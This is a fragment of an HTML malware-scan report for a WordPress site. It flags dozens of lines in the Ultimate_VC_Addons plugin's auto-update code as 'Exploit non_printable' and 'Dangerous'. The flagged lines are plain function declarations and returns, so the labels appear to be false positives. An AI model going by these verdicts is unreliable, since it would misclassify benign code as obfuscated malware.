</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 202</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">object $_data</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 204</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_get_plugin_information</span><span style="color: #007700">( </span><span style="color: #0000BB">$_data</span><span style="color: #007700">, </span><span style="color: #0000BB">$_action </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$_args </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 208</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$_data</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 25</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that initializes required sections</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 266</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$product_parent</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 268</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_is_product_bundled</span><span style="color: #007700">( </span><span style="color: #0000BB">$bsf_product</span><span style="color: #007700">, </span><span style="color: #0000BB">$search_by </span><span style="color: #007700">= </span><span style="color: #DD0000">'id' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 27</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 297</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$product_parent</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 303</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string $download_path</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 305</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_get_package_uri</span><span style="color: #007700">( </span><span style="color: #0000BB">$product_id </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 320</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 330</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$download_path</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 339</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$update_required</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 341</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_update_transient_data</span><span style="color: #007700">( </span><span style="color: #0000BB">$product_type </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 380</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$update_required</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 387</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return Array </span><span style="color: #0000BB">of plugins</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 389</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">prepare_plugins_for_update</span><span style="color: #007700">( </span><span style="color: #0000BB">$plugins </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 399</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$plugins</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 404</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">maybe_force_check_bsf_product_updates</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 417</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 419</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">use_beta_version</span><span style="color: #007700">( </span><span style="color: #0000BB">$product_id </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 427</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 433</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 443</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$version</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 445</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">beta_version_normalized</span><span style="color: #007700">( </span><span style="color: #0000BB">$beta </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 450</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$version</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 459</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_allow_beta_updates</span><span style="color: #007700">( </span><span style="color: #0000BB">$product_id </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 460</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">( </span><span style="color: #DD0000">"bsf_allow_beta_updates_</span><span style="color: #007700">{</span><span style="color: #0000BB">$product_id</span><span style="color: #007700">}</span><span style="color: #DD0000">"</span><span style="color: #007700">, </span><span style="color: #0000BB">false </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 467</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$slug</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 469</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_get_plugin_slug</span><span style="color: #007700">( </span><span style="color: #0000BB">$template </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 473</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$slug</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 482</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_update_display_license_link</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 50</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">to update plugin</span><span style="color: #DD0000">'s transient.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 527</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">brainstorm_all_products</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 53</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$_transient_data</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 545</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$all_products</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 553</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_add_registration_message</span><span style="color: #007700">( </span><span style="color: #0000BB">$plugin_data</span><span style="color: #007700">, </span><span style="color: #0000BB">$response </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 55</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">brainstorm_update_plugins_transient</span><span style="color: #007700">( </span><span style="color: #0000BB">$_transient_data </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 592</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add_beta_update_message</span><span style="color: #007700">( </span><span style="color: #0000BB">$plugin_data</span><span style="color: #007700">, </span><span style="color: #0000BB">$response </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 611</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is_beta_version</span><span style="color: #007700">( </span><span style="color: #0000BB">$version </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 612</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">strpos</span><span style="color: #007700">( </span><span style="color: #0000BB">$version</span><span style="color: #007700">, </span><span style="color: #DD0000">'beta' </span><span style="color: #007700">) ||</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 622</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string $reply</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 624</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">modify_download_package_message</span><span style="color: #007700">( </span><span style="color: #0000BB">$reply</span><span style="color: #007700">, </span><span style="color: #0000BB">$package</span><span style="color: #007700">, </span><span style="color: #0000BB">$current </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 648</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">parameter</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 649</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$reply</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 660</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array </span><span style="color: #0000BB">Brainstorm Products merged with Brainstorm Bundle Products</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 662</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">plugin_information</span><span style="color: #007700">( </span><span style="color: #0000BB">$brainstrom_products </span><span style="color: #007700">= array() ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 684</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$brainstrom_products</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_496").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/admin/bsf-core/auto-update/admin-functions.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 12.81 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:21</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 37</span><br><table id="file_497" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_sort</span><span style="color: #007700">( </span><span style="color: #0000BB">$a</span><span style="color: #007700">, </span><span style="color: #0000BB">$b </span><span style="color: #007700">) { return </span><span style="color: #0000BB">strcmp</span><span style="color: #007700">( </span><span style="color: #0000BB">strtolower</span><span style="color: #007700">( </span><span style="color: #0000BB">$a</span><span style="color: #007700">-></span><span style="color: #0000BB">short_name </span><span style="color: #007700">), </span><span style="color: #0000BB">strtolower</span><span style="color: #007700">( </span><span style="color: #0000BB">$b</span><span style="color: #007700">-></span><span style="color: #0000BB">short_name </span><span style="color: #007700">) ); } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 12</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 14</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_generate_rand_token</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 154</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_get_current_version' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 161</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">float</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 163</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_get_current_version</span><span style="color: #007700">( </span><span style="color: #0000BB">$template</span><span style="color: #007700">, </span><span style="color: #0000BB">$type </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 165</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 178</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$version</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 181</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_get_current_name' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 189</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
